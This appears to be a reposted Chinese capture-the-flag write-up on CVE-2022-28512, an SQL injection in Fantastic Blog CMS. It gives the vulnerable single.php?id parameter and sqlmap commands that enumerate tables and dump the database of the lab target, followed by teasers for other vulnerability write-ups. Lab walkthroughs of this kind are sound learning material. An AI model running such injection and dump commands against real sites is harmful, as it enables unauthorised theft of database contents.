CVE-2022-28512(Fantastic Blog (CMS))

9月前作者：qq_45092459 分类：Toy博客阅读(28) 违法举报

这篇具有很好参考价值的文章主要介绍了CVE-2022-28512(Fantastic Blog (CMS))。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

CVE-2022-28512(Fantastic Blog (CMS))

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。打开标靶，有一个博客网站，发现有注册登录端口。 cve-2022-28512,网络安全,安全,系统安全,web安全,安全架构
我先是自己上套路走流程没有发现到sql注入，然后回去看了哈他的提示.

结果漏洞存在于这个路径下，然后就是sqlmap一个跑就出来了。

cve-2022-28512,网络安全,安全,系统安全,web安全,安全架构
查找表

python sqlmap.py -u "http://eci-2ze12udt1f7az60j7kfc.cloudeci1.ichunqiu.com/single.php?id=1" -D ctf --tables

cve-2022-28512,网络安全,安全,系统安全,web安全,安全架构
得到最后flag

python sqlmap.py -u "http://eci-2ze12udt1f7az60j7kfc.cloudeci1.ichunqiu.com/single.php?id=1" -D ctf -T flag --columns --dump

cve-2022-28512,网络安全,安全,系统安全,web安全,安全架构
另外一种一句话直接出来所有的

python sqlmap.py -u "http://eci-2ze12udt1f7az60j7kfc.cloudeci1.ichunqiu.com/single.php?id=1" --batch --dump

cve-2022-28512,网络安全,安全,系统安全,web安全,安全架构文章来源地址https://www.toymoban.com/news/detail-619512.html

到了这里，关于CVE-2022-28512(Fantastic Blog (CMS))的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

网络靶场实战-RouterOS漏洞分析(CVE-2022-45315)

本环境是蛇矛实验室基于\\\"火天网演攻防演训靶场\\\"进行搭建，通过火天网演中的环境构建模块，可以灵活的对目标网络进行设计和配置，并且可以快速进行场景搭建和复现验证工作。火天网演中，内置大量固件设备，包含大型网络设备及物联网设备，可以灵活选取进行测试验

2024年02月11日
浏览(44)
[网络]公共网络安全漏洞库：CVE/CNCVE

以网络安全行业中最大的、影响范围最广的CVE为例。 CVE 的英文全称是“Common Vulnerabilities Exposures”通用漏洞披露。 CVE就好像是一个字典表，为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字，可以帮助用户在各自独立的各种漏洞

2024年02月07日
浏览(39)
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程（特详细）

分享一个非常详细的网络安全笔记，是我学习网安过程中用心写的，可以点开以下链接获取：超详细的网络安全笔记 Apache Tomcat文件包含漏洞（CNVD-2020-10487/CVE-2020-1938）。该漏洞是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的

2024年02月08日
浏览(54)
Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点，在 0.2.13 版本之前存在着目录遍历漏洞，编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径，经过组合拼接达到目录遍历，虽然源码中检查了文件名（filename）

2024年02月08日
浏览(38)
nginx相关漏洞处理：CVE-2016-2183、CVE-2022-41741、CVE-2022-41742

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档漏扫发现机器上的nginx使用的openssl版本有点低，在加上nginx的部署时间较早，还是1.20.2版本的，一起进行升级。 SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】 nginx 缓冲区错误漏洞(CVE-2022-41741) nginx 越

2024年02月08日
浏览(47)
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现

漏洞描述 EmpireCMS（帝国网站管理系统）是一套内容管理系统（ CMS ），EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行，EmpireCMS7.5版本中的/e/class/moddofun.php文件的 LoadInMod函数存在安全漏洞,攻击者可利用该漏

2023年04月13日
浏览(38)
TerraMaster TOS 远程命令执行（CVE-2022-24989）TerraMaster TOS 敏感信息泄露（CVE-2022-24990）

一、漏洞名称 TerraMaster TOS 远程命令执行（CVE-2022-24989） TerraMaster TOS 敏感信息泄露（CVE-2022-24990）二、影响版本 TerraMaster NAS 4.2.x 4.2.30 三、漏洞危害远程命令执行敏感信息泄露四、POC EXP ¤ 五、资产搜索 fofa: app=“TERRAMASTER-NAS” 六、漏洞背景 / 参考 / 延申 TerraMaster TOS 可能允

2024年02月03日
浏览(61)
春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

靶标介绍： Subrion CMS 4.2.1 存在文件上传漏洞进入题目： admin/admin 点击设置：后台管理主页：上传页面：上传目录： /panel/uploads/ 查看上传位置：上传位置： uploads/system.pht flag{24505f02-d430-4d3b-905e-17349e09c34c}

2024年02月11日
浏览(33)
CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

Spring framework 是Spring 里面的一个基础开源框架，其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日，VMware Tanzu发布漏洞报告，Spring Framework存在远程代码执行漏洞，在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行

2023年04月21日
浏览(60)
CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

微服务架构与Spring Cloud 最开始时，我们开发java项目时，所有的代码都在一个工程里，我们把它称为单体架构。当我们的项目的代码量越来越大时，开发的成员越来越多时，这时我们项目的性能以及我们开发的效率都会存在非常大的问题，所以对于这样的项目，我们需要把它

2023年04月14日
浏览(48)